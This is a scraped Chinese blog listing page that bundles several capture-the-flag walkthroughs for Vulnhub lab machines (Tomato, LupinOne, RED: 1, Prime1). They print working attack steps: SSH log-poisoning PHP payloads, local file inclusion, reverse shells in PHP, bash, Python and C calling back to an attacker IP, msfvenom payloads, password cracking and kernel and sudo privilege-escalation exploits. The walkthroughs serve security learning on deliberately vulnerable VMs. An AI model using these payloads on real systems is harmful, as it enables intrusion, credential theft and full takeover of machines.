精华内容
下载资源
问答
  • Vulnhub篇Tomato
    2021-01-12 14:52:47

    学习笔记下载

    https://download.csdn.net/download/qq_41901122/14122059
    

    解压密码20210112
    在这里插入图片描述

    环境搭建

    下载地址:
    https://www.vulnhub.com/entry/tomato-1,557/
    

    kali 192.168.232.140

    tomato: 192.168.232.175

    win10 :192.168.232.171

    第一部分 信息收集

    第一步 扫描,发现主机
    nmap -sP 192.168.232.0/24
    arp-scan -l
    

    在这里插入图片描述
    在这里插入图片描述

    第二步 扫描开放的端口
    nmap -A -p- 192.168.232.175
    nmap -sS -sV -p- -v  192.168.232.175 
    

    在这里插入图片描述

    在这里插入图片描述

    第三步 访问网站,查看网站信息,查看网站的源代码
    http://192.168.232.175/
    

    在这里插入图片描述

    第二部分 漏洞查找

    第一步 扫描目录
    dirb http://192.168.232.175
    python3 dirmap.py  -i http://192.168.232.175 -lcf 
    

    在这里插入图片描述

    ---- Scanning URL: http://192.168.232.175/ ----
    ==> DIRECTORY: http://192.168.232.175/antibot_image/                                                           
    + http://192.168.232.175/index.html (CODE:200|SIZE:652)                                                        
    + http://192.168.232.175/server-status (CODE:403|SIZE:280)   
    

    在这里插入图片描述

    第二步 访问目录,发现目录遍历漏洞
    http://192.168.232.175/antibot_image/
    

    在这里插入图片描述

    第三步 查找可利用的文件
    http://192.168.232.175/antibot_image/antibots/info.php
    主要是查看注释
    

    在这里插入图片描述
    在这里插入图片描述

    <html lang="en">
    <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Document</title>
    </head>
    <body>
    <!-- </?php include $_GET['image']; -->
    
    </body>
    </html>
    

    在这里插入图片描述

    第四步 利用文件包含漏洞
    http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../etc/passwd
    

    在这里插入图片描述
    在这里插入图片描述

    第五步 利用文件包含漏洞,查看日志文件
    http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log
    

    在这里插入图片描述

    第三部分 漏洞利用

    第一步 已知info.php文件存在文件包含漏洞,以及开放ssh端口,
    尝试包含ssh认证日志文件/var/log/auth.log,并利用ssh认证用户名实现命令注入:(使用之前发现的2211端口是ssh,日志里面发现tomato用户,查看日志信息)
    
    

    在这里插入图片描述

    第二步 利用<?php system($_GET['cmd']);?>作为用户名进行php代码注入:
    ssh '<?php system($_GET['cmd']);?>'@192.168.232.175 -p 2211
    
    ssh '<?php system($_GET['cmd']);?>'@192.168.232.187 -p 2211
    

    在这里插入图片描述

    第三步 验证PHP代码是否注入成功
    http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&cmd=ls
    

    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    第二步 利用php,开启nc监听
    nc -lvvp 666
    

    在这里插入图片描述

    第三步 反弹shell

    php反弹shell代码:

    hp -r '$sock=fsockopen("192.168.232.140",666);exec("/bin/sh -i <&3 >&3 2>&3");'
    

    进行url编码后:

    php+-r+%27%24sock%3dfsockopen(%22192.168.232.140%22%2c666)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27
    
    

    触发反弹shell

    http://192.168.232.175/antibot_image/antibots/info.php?image=../../../../../var/log/auth.log&cmd=php+-r+%27%24sock%3dfsockopen(%22192.168.232.140%22%2c666)%3bexec(%22%2fbin%2fsh+-i+%3c%263+%3e%263+2%3e%263%22)%3b%27
    

    在这里插入图片描述

    第四步 开启交互式shell
    python3 -c "import pty;pty.spawn('/bin/bash')"
    

    在这里插入图片描述

    第四部分 提权

    第一步 查看系统信息
    uname -a
    whoami
    

    在这里插入图片描述
    在这里插入图片描述

    第二步 下载提权脚本,执行,编译
    使用CVE-2017-6074的poc
    git clone https://github.com/kkamagui/linux-kernel-exploits.git
    cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074
    ./compile.sh
    

    在这里插入图片描述

    第三步 把exp上传到网站根目录,授予权限,并执行
    cd /tmp 
    wget http://192.168.232.129/CVE-2017-6074
    chmod +x CVE-2017-6074
    ./CVE-2017-6074
    

    在这里插入图片描述

    第四步 查找flag
    cd /root
    ls
    cat proof.txt
    

    在这里插入图片描述

    摘抄


    去靠近给你正能量的朋友圈。

    谁也都知道,朋友对于性格形成的影响非常重大。
    一个人的好坏,朋友熏染的力量要居大半。
    每个人身旁有一个“圈子”,这圈子就是他所曾亲近的人围成的,
    他跳来跳去,却跳不出这圈子。
    在某一种圈子就成为某一种人。
    古人说:“与善人交,如入芝兰之室,久而不闻其香;
    与恶人交,如入鲍鱼之市,久而不闻其臭。”
    一个人应该谨慎择友,择他所在的圈子,道理就在此。
    出自《谈交友》作者丨朱光潜


    更多相关内容
  • VulnHub

    2021-02-10 03:55:32
    VulnHub par Zyrfex VulnHub que j'ai总站的历史机器: NUMERO 附件 MOIS NOM 尼维奥 2 2021年 02 1个 2021年 01
  • 这次的靶机是Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
  • Vulnhub靶场题解

    2018-08-24 17:17:10
    介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
  • 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
  • vulnhub-Nagini.txt

    2021-06-10 10:44:53
    Nagini
  • Vulnhub篇Tomato.zip

    2021-01-12 14:51:45
    主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
  • Vulnhub靶场题解.html

    2021-08-12 18:16:52
    Vulnhub靶场题解.,适合渗透测试人员学习交流
  • VulnHub-Tr0ll1.zip

    2021-01-12 15:34:42
    VulnHub-Tr0ll1靶机学习笔记,一部分是学习笔记过程,另一部分是学习过程整理的lol.pacp\.c文档、user.txt等文档,供大家参考学习
  • VulnHub 靶机系列实战教程.pdf
  • VulnHub靶场LupinOne

    千次阅读 2022-02-01 21:51:08
    VulnHub靶场LupinOne 这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适 直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置. 一.信息...

    VulnHub靶场LupinOne

    这个靶场是一个很好的练习环境,整套渗透流程,用来模拟环境非常合适

    链接:https://pan.baidu.com/s/1lX79juqZJl4roKakTwWQxQ 
    提取码:8rcv
    

    在这里,我把我遇到的问题一起分享给大家

    直接解压用虚拟机打开就行,不用自己配置,没有账号密码,需要自己一步步来,对了,这是自动获取IP的,不需要自己配置.
    在这里插入图片描述

    一.信息收集

    信息收集是很重要的,举个栗子来说,比如约出自己的女神出来玩,肯定向了解女神的经济情况还有喜好嘛,通过她的微信朋友圈,她身边的好友,淘宝等等,了解一个人,就要从最贴近生活的方向开始,就像"只有千日做贼,那有千日防贼",感觉有点不太贴切,意思是差不多的,用这个只是想表达信息收集的重要性.

    1.1寻找目标

    在正常情况下,我们并不知道目标IP,在这里可以使用nmap进行扫描,Nmap具体是什么可以百度了解,这里不在多说.

    我的kali所用IP:192.168.31.15(后面我的ip会变化,因为这不是再一个地方完成的,但是不影响参考)

    nmap探测

    命令:nmap 192.168.31.15/24
    在这里插入图片描述

    Nmap是一个很强大的工具,关于它的用法一定要好好掌握,上图中可以看到IP为’192.168.31.251’的就是靶机地址,详细扫描

    在这里插入图片描述

    靶机开发了22和80端口

    默认就是访问80端口

    检查出现一句话" Its an easy box, dont give up. “意思是"它是一个简单的盒子,不要放弃。”
    在这里插入图片描述

    至于22端口是ssh的,现在没有账号密码也无法使用

    到这里,就可以进入下一个模块了

    二.Web渗透

    2.1目录遍历扫描

    对于目录遍历,在一些大企业的网站,都有安全设备,对于目录遍历这样的操作,是会有告警的,最近一直在重保,这样的告警很多很多.

    对于目录遍历,工具有很多,比如 御剑,gobuster,DirBuster及wwwscan等,而这些都是工具,在Github都能找到.最主要的还是字典.

    在这里我使用gobuster进行目录遍历

    我的字典位置

    在这里插入图片描述

    gobuster dir -w big.txt -u http://192.168.31.251
    

    在这里插入图片描述
    上面扫描的结果出来了,返回值200的时robots.txt文件

    在这里插入图片描述在这里插入图片描述在这里插入图片描述

    试着访问~myfile这个文件夹,好家伙,页面就是404,下面还有一个注释的话“你可以的,继续努力。”
    在这里插入图片描述

    到这里似乎陷入僵局,猜测需要传参数

    wfuzz -c -w discovery/predictable-filepaths/filename-dirname-bruteforce/upload_variants.txt -u http://192.168.43.36/~myfiles/?FUZZ=a
    

    没用,继续目录扫描

    wfuzz -c -w directory-list-2.3-big.txt -u http://192.168.43.36/~FUZZ |grep -v 404
    

    过滤掉404

    目前就出来一个,通过浏览器访问

    在这里插入图片描述

    在这里插入图片描述
    在这里插入图片描述

    这段文字包含信息很多,需要仔细阅读

    私钥文件一般使用格式:txt、html、pub、cer、pem、der、key等等

    这里爆破使用burp2021.21.1,截取数据报,隐藏文件格式就像这样的

    在这里插入图片描述

    设置位置以及字典

    在这里插入图片描述
    在这里插入图片描述

    这里不得不提中文版的真舒服,第一个位置用这个字典,对了这字典在GitHub都能找到。这里就不多说了
    在这里插入图片描述

    第二个字典自己手动添加就行,文件后缀名,线程60

    在这里插入图片描述

    ……我错了,中文版的执行爆破程序报错,英文版的没有问题,我这是第一次用这个版本,唉,bug还是太多了
    在这里插入图片描述

    既然出来了,就没有必要再往下跑了,访问这个文件(后面的我试了,没有其它文件了)
    在这里插入图片描述

    看着这像base64,试着转码一下,很明显,这个不是

    在这里插入图片描述

    这里推荐一个网站 链接: link. https://www.dcode.fr/identification-chiffrement

    这个网站可以识别一些加密方式,Base58概率最大

    在这里插入图片描述

    可以看到,解码出来的结果就是一个证书

    在这里插入图片描述

    将其保存以下形式

    在这里插入图片描述

    2.2破解私钥爆破密码

    之前做的时候,kali自带的python3.x,执行ss2john.py报错,这个是我其他系统配置的python2.7环境,可以正常执行这个脚本
    在这里插入图片描述在这里插入图片描述在这里插入图片描述
    这个就是生成的内容,发送到kali中,使用john爆破密码

    还记得上上面有段话吗,这个关键咱们现在用到了
    在这里插入图片描述
    在这里插入图片描述

    关于john的用法可以百度,可以看它的帮助命令,很简单使用

    john creck.txt --fork=4 fork --wordlist=/usr/share/wordlists/fasttrack.txt
    

    在这里插入图片描述

    密码出来了,P@55w0rd! ,密码出来了,用户名呢?难道是root,怎么可能呢,用户名就是icex64,上面那段文字给的

    2.3登录

    在这里插入图片描述

    设置权限为600,私钥文件仅可自己读,但是,我这里登录不上去
    在这里插入图片描述

    可以通过XSHLL
    在这里插入图片描述
    在这里插入图片描述

    输入后确定,也可修改密码,点击浏览-属性-修改密码,记住密码,登录即可
    在这里插入图片描述
    在这里插入图片描述
    在这里插入图片描述

    在这里插入图片描述

    3mp!r3{I_See_That_You_Manage_To_Get_My_Bunny}
    

    有个flag

    三.提权

    3.1提权到arsene

    关于sudo的命令可以查看它的帮助

    sudo -l   #-l, --list 列出用户的权限或检查特定命令;
    

    在这里插入图片描述

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7iAXcFOe-1643723462374)(C:\Users\yds\Desktop\漏洞详解\靶机练习No.7 VulnHub靶场LupinOne\靶机练习No.7 VulnHub靶场LupinOne.assets\image-20220130235932932.png)]

    查看action文件内容,还有一个note.txt,没别的意思 ,就是要执行heist.py

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-bJOp1HpR-1643723462374)(C:\Users\yds\Desktop\漏洞详解\靶机练习No.7 VulnHub靶场LupinOne\靶机练习No.7 VulnHub靶场LupinOne.assets\image-20220131000906273.png)]

    好了,再次查看heist.py这个文件

    这里引入webbrowser

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fOc3XxB0-1643723462374)(C:\Users\yds\Desktop\漏洞详解\靶机练习No.7 VulnHub靶场LupinOne\靶机练习No.7 VulnHub靶场LupinOne.assets\image-20220131001540337.png)]

    查找webbrowser

    locate webbrowser
    

    [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LRKJrZNa-1643723462374)(C:\Users\yds\Desktop\漏洞详解\靶机练习No.7 VulnHub靶场LupinOne\靶机练习No.7 VulnHub靶场LupinOne.assets\image-20220131001921386.png)]
    编辑文件添加下面那句话,我这使用vi出问题.所以用的nano
    在这里插入图片描述在这里插入图片描述

    执行id,成功提权到arsene

    在这里插入图片描述

    3.2提权到root_1

    https://gtfobins.github.io/  #Linux提权
    

    在这里插入图片描述

    TF=$(mktemp -d)
    echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
    sudo pip install $TF
    

    在这里插入图片描述



    在这里插入图片描述

    flag:

    3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}
    

    结束

    3.3提权到root_2

    通过反弹shell方式连接

    通过这种方式,会遇到权限问题,需要再"/home/icex64"目录下创建一个名为“setup.py”的文件,如果你这个时候,权限是arsene的权限,你是无法再这里创建的,需要再icex64权限下创建"setup.py"

    vi setup.py #或者是nano setup.py
    
    from setuptools import setup
    from setuptools.command.install import install
    import os, socket, subprocess
    
    class CustomInstall(install):
      def run(self):
        install.run(self)
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect(("192.168.10.131",4444)) #此处是kali ip地址
        os.dup2(s.fileno(),0)
        os.dup2(s.fileno(),1)
        os.dup2(s.fileno(),2)
        p=subprocess.call(["/bin/sh","-i"])
    
    setup(name='FakePip',
          version='0.0.1',
          description='Reverse shell',
          url='xx.xx.xx.xx',
          author='nathan',
          author_email='xx@xx',
          license='MIT',
          zip_safe=False,
          cmdclass={'install': CustomInstall})
    

    如果,你没再icex64下面创建此脚本,

    再执行此脚本前,需要再kali中执行监听,会报错
    在这里插入图片描述

    nc -lvvp 4444
    

    在这里插入图片描述

    再执行

    sudo pip install . --upgrade
    

    在这里插入图片描述
    kali中显示

    在这里插入图片描述
    在这里插入图片描述

    3mp!r3{congratulations_you_manage_to_pwn_the_lupin1_box}
    
    See you on the next heist.
    

    好了,到这里差不多结束了

    也可以再root命令下修改root密码

    passwd root
    

    在这里插入图片描述
    在这里插入图片描述

    当然了,也可以修改其他用户密码了

    四.收获

    实践是检验真理的唯一标准
    
    展开全文
  • VulnHub:VulnHub Box演练

    2021-03-16 01:48:21
    VulnHub:VulnHub Box演练
  • vulnhub:本地搜索NVD

    2021-05-09 17:41:22
    Vulnhub __ __ _ _ _ _ \ \ / / | | | | | | | | \ \ / /_ _ | | _ __ | |__| | _ _ | |__ \ \/ /| | | || || '_ \ | __ || | | || '_ \ \ / | |_| || || | | || | | || |_| || |_) | \/ \__,_||_||_| |_||_|...
  • vulnhub靶场,RED: 1

    千次阅读 2022-02-11 10:44:40
    vulnhub靶场,RED: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/red-1,753/ 攻击机:kali(192.168.109.128) 靶机:RED: 1(192.168.109.197) 下载好靶机之后直接使用VMware Workstation Pro虚拟机...

    vulnhub靶场,RED: 1

    环境准备

    靶机下载地址:https://www.vulnhub.com/entry/red-1,753/
    攻击机:kali(192.168.109.128)
    靶机:RED: 1(192.168.109.197)
    下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式
    目标:提升为root权限获取root目录下的flag

    信息收集

    使用arp-scan确定目标靶机

    确定目标靶机IP为192.168.109.197
    使用nmap扫描查看目标靶机端口开放情况

    开放端口:22、80
    浏览器访问目标靶机80端口

    域名自动跳转到redrocks.win,说明存在域名重定向,进入配置文件/etc/hosts进行配置

    再次进行访问

    页面提示说找不到他的后门,说明此网站肯定已经被植入了后门,查看一下源代码

    这里有一段英文,意思就是说要向Mr. Miessler寻求帮助,也不知道是啥意思,在网上搜一下

    发现其中指向了gitub上的一个字典,正好kali上也是自带这个字典的
    尝试用其中的字典进行目录扫描

    gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txt -x .php -u http://redrocks.win/
    


    发现一个NetworkFileManagerPHP.php页面,进行访问,但是访问后发现是一片空白,说明确实存在这个页面,再根据状态码为500猜测这个页面可能存在LFI,使用wfuzz测试一下参数,字典也用github上面提供的字典文件

    wfuzz -c -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test' -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
    


    使用key参数测试一下LFI

    确实存在文件包含漏洞

    渗透过程

    尝试污染日志文件和远程包含均失败,使用filter协议查看NetworkFileManagerPHP.php源码

    将结果base64解码一下

    里面又存在一段base64加密的密文,使用base64在进行一次解密

    That password alone won’t help you! Hashcat says rules are rules
    仅凭那个密码对您没有帮助! Hashcat 说规则就是规则
    提到了密码、Hashcat 和规则。由于它是 base64 编码的,我们可以假设 Red 在谈论 Hashcat 的 Best64 规则为密码突变,想到的这里大概能获取 wp-config 文件,里面有数据库的密码:

    经base64解码得

    <?php
    
    /**
    
     * The base configuration for WordPress
    
     *
    
     * The wp-config.php creation script uses this file during the installation.
    
     * You don't have to use the web site, you can copy this file to "wp-config.php"
    
     * and fill in the values.
    
     *
    
     * This file contains the following configurations:
    
     *
    
     * * MySQL settings
    
     * * Secret keys
    
     * * Database table prefix
    
     * * ABSPATH
    
     *
    
     * @link https://wordpress.org/support/article/editing-wp-config-php/
    
     *
    
     * @package WordPress
    
     */
    
    // ** MySQL settings - You can get this info from your web host ** //
    
    /** The name of the database for WordPress */
    
    define( 'DB_NAME', 'wordpress' );
    
    
    
    /** MySQL database username */
    
    define( 'DB_USER', 'john' );
    
    
    
    /** MySQL database password */
    
    define( 'DB_PASSWORD', 'R3v_m4lwh3r3_k1nG!!' );
    
    
    
    /** MySQL hostname */
    
    define( 'DB_HOST', 'localhost' );
    
    
    
    /** Database Charset to use in creating database tables. */
    
    define( 'DB_CHARSET', 'utf8' );
    
    
    
    /** The Database Collate type. Don't change this if in doubt. */
    
    define( 'DB_COLLATE', '' );
    
    
    
    define('FS_METHOD', 'direct');
    
    
    
    define('WP_SITEURL', 'http://redrocks.win');
    
    define('WP_HOME', 'http://redrocks.win');
    
    
    
    /**#@ 
    
     * Authentication unique keys and salts.
    
     *
    
     * Change these to different unique phrases! You can generate these using
    
     * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
    
     *
    
     * You can change these at any point in time to invalidate all existing cookies.
    
     * This will force all users to have to log in again.
    
     *
    
     * @since 2.6.0
    
     */
    
    define('AUTH_KEY',         '2uuBvc8SO5{>UwQ<^5V5[UHBw%N}-BwWqw|><*HfBwJ( $&%,(Zbg/jwFkRHf~v|');
    
    define('SECURE_AUTH_KEY',  'ah}<I`52GL6C^@~x C9FpMq-)txgOmA<~{R5ktY/@.]dBF?keB3} Y^u!a54 Xc(');
    
    define('LOGGED_IN_KEY',    '[a!K}D<7-vB3Y&x_<3e]Wd J]!o A:U@QUZ-RU1]tO@/N}b}R@ /$ u*pJ|Z(xu-');
    
    define('NONCE_KEY',        ' g4|@~:h,K29D}$FL-f/eujw(VT;8wa7xRWpVR: >},]!Ez.48E:ok 8Ip~5_o a');
    
    define('AUTH_SALT',        'a;,O<~vbpL |@W !Rs1o,T$r9(LwaXI =I7ZW$.Z[ BQ=B6QG7nr w_bQ6B]5q4c');
    
    define('SECURE_AUTH_SALT', 'GkU:% Lo} 9}w38i:%]=uq&J6Z&RR#v2vsB5a_  .[us;6mE |$x*  D*Ke :Nt:');
    
    define('LOGGED_IN_SALT',   '#`F9&pm_jY}N3y0&8Z]EeL)z,$39,yFc$Nq`jGOMT_aM*`<$9A:9<Kk^L}fX@ iZ');
    
    define('NONCE_SALT',       'hTlFE*6zlZMbqluz)hf:-:x-:l89fC4otci;38|i`7eU1; k[!0[ZG.oCt2@-y3X');
    
    
    
    /**#@-*/
    
    
    
    /**
    
     * WordPress database table prefix.
    
     *
    
     * You can have multiple installations in one database if you give each
    
     * a unique prefix. Only numbers, letters, and underscores please!
    
     */
    
    $table_prefix = 'wp_';
    
    
    
    /**
    
     * For developers: WordPress debugging mode.
    
     *
    
     * Change this to true to enable the display of notices during development.
    
     * It is strongly recommended that plugin and theme developers use WP_DEBUG
    
     * in their development environments.
    
     *
    
     * For information on other constants that can be used for debugging,
    
     * visit the documentation.
    
     *
    
     * @link https://wordpress.org/support/article/debugging-in-wordpress/
    
     */
    
    define( 'WP_DEBUG', false );
    
    
    
    /* Add any custom values between this line and the "stop editing" line. */
    
    
    
    
    
    
    
    /* That's all, stop editing! Happy publishing. */
    
    
    
    /** Absolute path to the WordPress directory. */
    
    if ( ! defined( 'ABSPATH' ) ) {
    
    	define( 'ABSPATH', __DIR__ . '/' );
    
    }
    
    
    
    /** Sets up WordPress vars and included files. */
    
    require_once ABSPATH . 'wp-settings.php';
    

    账号:john
    密码:R3v_m4lwh3r3_k1nG!!
    尝试使用这个账号密码进行ssh远程连接

    连接失败,根据前面得hashcat,将密码保存到pass.txt文件使用hashcat规则进行破解

    hashcat --stdout pass.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt
    


    使用hydra进行暴力破解

    hydra -l john -P passlist.txt ssh://192.168.109.197
    


    使用john:R3v_m4lwh3r3_k1nG!!6进行远程连接

    连接成功

    权限提升

    在当前目录下发现一个note_from_red.txt文件,查看其内容

    这里发现好像将catvi命令的作用给互换了,这个文件给出得内容也是说的这个意思
    查看sudo命令

    发现ippsec用户在无密码的情况下可以执行/usr/bin/time命令,在提权网站上查找提权方法

    再次准备进行操作的时候发现ssh连接自动断掉了,而且再次进行连接发现密码也被修改了,只能再次破解一次

    使用sudo -u ippsec /usr/bin/time /bin/bash提权为ippsec用户

    想进行下一步操作,发现shell又被断掉了

    应该是这个靶机的设定,那再重复之前的操纵,在靶机上创建一个反弹shell的脚本
    靶机上:

    cd /tmp
    cat shell.sh
    内容为:
    #!/bin/bash
    bash -c 'bash -i >& /dev/tcp/192.168.109.128/4444 0>&1'
    保存后退出
    chmod +x shell.sh
    ./shell.sh
    

    kali监听本地的4444端口即可

    shell连接成功,升级一下shell

    1. 在 /tmp 目录中创建一个反向 shell bash 脚本
    2. 在 kali 上运行 `nc -lvvp 4444` 和 执行 shell 脚本
    3. `python3 -c 'import pty;pty.spawn("/bin/bash")'`
    4. `export TERM=xterm` 然后 Ctrl+Z 退出来一下
    5. `stty raw -echo;fg` 回车后输入 reset 再回车
    


    即可得到一个不会断开的shell

    做到这里,发现一个问题,就是命令行上总是会不时的弹出一些消息,肯定是设置什么定时任务,下载pspy64s监听
    spy是一种命令行工具,无需root权限即可监听进程。可查看其他用户执行的命令,cron作业等

    https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
    

    先在kali上下载好后搭建一个临时的http服务即可

    wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s
    
    python3 -m http.server 8000
    


    靶机上:

    wget http://192.168.109.128:8000/pspy64s
    chmod +x pspy64s
    ./pspy64s
    


    这里不知道怎么回事反弹回来的shell就一直有问题,就凑合看吧

    这应该是他对系统的后门,查看一下这个 supersecretfileuc.c 文件

    发现是定时弹出的脚本,所以只需要上传一个提权的脚本将此脚本进行替换即可
    先删除 /var/www/wordpress/.git/supersecretfileuc.crev 文件

    写入由c语言编写的反弹shell代码

    反弹shell代码:
    #include <stdio.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    
    int main(void){
        int port = 4444;
        struct sockaddr_in revsockaddr;
    
        int sockt = socket(AF_INET, SOCK_STREAM, 0);
        revsockaddr.sin_family = AF_INET;       
        revsockaddr.sin_port = htons(port);
        revsockaddr.sin_addr.s_addr = inet_addr("192.168.109.128");
    
        connect(sockt, (struct sockaddr *) &revsockaddr, 
        sizeof(revsockaddr));
        dup2(sockt, 0);
        dup2(sockt, 1);
        dup2(sockt, 2);
    
        char * const argv[] = {"/bin/bash", NULL};
        execve("/bin/bash", argv, NULL);
    
        return 0;       
    }
    

    使用python搭建临时的http服务

    python3 -m http.server 8000
    


    靶机上:

    wget http://192.168.109.128:8000/supersecretfileuc.c
    


    然后kali上监听4444端口,稍微等待一下,即可反弹回来一个权限为root的shell

    在其root目录下获取最终的flag,靶机RED: 1渗透结束

    展开全文
  • vulnhub靶场-Prime1

    千次阅读 2022-03-30 16:56:56
    练习靶场 prime:1 下载地址:https://download.vulnhub.com/prime/Prime_Series_Level-1.rar  目的是找到flag。要进入到系统目录中去找。 一. 网络的设置 我遇到的情况是NET模式下连接不成功,所以我进入的拯救...

    练习靶场 prime:1

    下载地址:https://download.vulnhub.com/prime/Prime_Series_Level-1.rar

     目的是找到flag。要进入到系统目录中去找。

    一.  网络的设置

    我遇到的情况是NET模式下连接不成功,所以我进入的拯救模式,将动态网络配置改成静态网络来进行的复现。其中具体的原因我还没弄清楚。但设置完静态网络后就能够正常复现了。

    二 . 开始渗透

      1. 检测IP和端口(nmap工具)

      按照靶机的设定,在不知道具体的IP地址情况下对prime1靶机进行攻击,现在我的ip是静态的,我是知道IP的,但是这个不影响复现,还是先进行对IP地址的扫描。在kali系统中用nmap工具进行操作:

    namp -sP 192.168.96.96.0/24       // -sP参数是 使用ping命令来扫描主机,发现主机的。

     nmap -P 192.168.96.221        //-P 是扫描该主机中的port端口,没扫出来换参数。

    nmap -A -o -sV 192.168.96.221   //-A综合扫描,-o主机系统 ,-vS 版本扫描

     2. 目录扫描(dirb工具)

      前面扫描到了IP和端口,查看到22端口和80端口是开放的,尝试看看网站能否访问,是可以访问的,但是没有地方可以输入,进行下一步尝试。

      所以进行目录扫描开是否有可以利用的目录,这里用到kali中dirb工具:

    命令:dirb http://192.168.96.221/       //这个扫描有太多的目录,所以进行过滤。这里看到wordpress,一个开源的CMS(内容管理系统)

    命令:dirb http://192.168.96.221 -X .txt,.php,.zip    //-X是 在字典后加上后缀

     得出的三个目录挨个访问一下,用kali中的curl来访问),有一个有用的信息location.txt,先记录下来。

     其中两个php文件我们就要考虑到是否有参数可以利用?

    三. 扫描参数(fuzz工具)

      利用dirb扫描出的php文件,看看是否可以得到信息。

    命令: wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.96.221/index.php?FUZZ

     这里得到信息有很多,我们能要进行筛选有用的,可以从word字节数来筛选(ps:也可用其他的条件筛选)这里用到参数  “--hw 12 ”。就筛选出来file

     带入访问:

    看到提示digginf wrong file ,这像是文件包含,先尝试一下。就用前面的location.txt,得到了下一步的提示,use  ‘secrettier360' parameter on some other page..。

     用这个提示访问。

     利用文件包含获取信息,/etc/passwd

    在倒数第二行中可以看到 /home/saket/password.txt,这可能存放着密码信息。follow_the_ippsec

     这里找到了密码,去系统登录页面去登录发现不能登录。在开放的端口去尝试数据库的登录也不行。这里就要想到在dirb工具扫描时有wordpress。看看能否从中突破?

    四. wordpress的渗透

    登录它的后台登录页面:http://192.168.96.221/wordpress/wp-admin/user/admin.php

    但是缺少用户名,着就要用到cmseek工具,可以枚举用户名。

          cmseek -u http://192.168.96.221/wordpress/

     没有扫描出来用户名,换另一个工具:wpscan

    wpscan --url http://192.168.96.221/wordpress/ --enumerate u   //参数 --url 域名 ,--enumerate 枚举用户名

    可以得到用户名:victor。

     这里进入到worpress的后台,并且还是通过最高权限的用户victor登录的。在wordpress中我们可以通过扫描器直接去扫描,这里我们用wordpress的一个可以上传代码的地方去突破。在Appearance中的Theme Editor找到一个可以保存代码的地方。

     在找到这个地方一阵幸喜,因为我们可以通过它上传一句话木马来获取权限,但是考虑到一句话木马很可能被WAF干掉,我们换一种方式 用反弹连接,反弹连接我们可以通过GitHub上搜索一个,也可以通过kali中的工具msfconsole,它是一个强大的渗透工具,现在讲一讲使用它来建立的反弹连接。

    生成payload,用msfconsole的一个模块:

    命令 msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.96.226 lport=7777 -o shell.php

    上面命令中-p 载荷payload -o 输出到指定文件 lhost 攻击机的ip lport 端口

    将shell.php中的payload复制到wordpress中,上传。同时我们还要知道上传的文件路径。

     将payload上传了,在kali中进入msfconsole,

     开启监听:use exploit/multi/handler,

    开始输入设置的,set payload php/meterpreter/revere.php

    在输入 set lhost 192.168.96.221

    再输入 set lport 7777     

    最后输入 exploit   

    输入完成后如果参数都正确,开启监听,访问  http://192.168.96.221/wordpress/wp-content/themes/twentynineteen/secret.php(这就是payload的上传路径) 之后就能监听,并建立一个对话。

     建立的对话可以查到靶机的版本——用命令:sysinfo

    知道了靶机的版本,通过kali中的工具msfconsole查到一些系统的漏洞,并且有可利用的c文件。

    我们用xshell再连接一个kali,打开msfconsole,输入命令 :searchsploit 16.04 Ubuntu    在里面找到对应版本的漏洞信息。

     我们再在xshell中启一个kali,把.c文件复制到当前用户目录下,并且编译输出一个可执行文件45010

     完成上面的步骤后我们在建立的反弹连接的对话上上传编译的文件

     上传的45010文件传到tmp目录下是该目录下可读写。我们在查看一些文件是否上传了,并且看看是否可执行,如果不能执行我们提升权限。

     上面看到45010文件不能执行,我们知道提升权限的命令chmod +x。

    提升权限后执行该文件 ./45010 执行后我们就可以在文件目录中找需要的文件。

     PS 有些情况我们下载的靶机的版本并不是Ubuntu4.10而是Ubuntu 4.15,就不能通过45010这个复现成功。

    新人发帖,欢迎指出不足,虚心接受

    展开全文
  • Vulnhub-CTF-Writeups 该备忘单针对CTF玩家和初学者,可帮助他们对Vulnhub实验室进行分类。 此列表包含hackingarticles上所有可用的文章。 我们已经根据我们的经验执行并编制了此列表。 请与您的联系分享此信息,并...
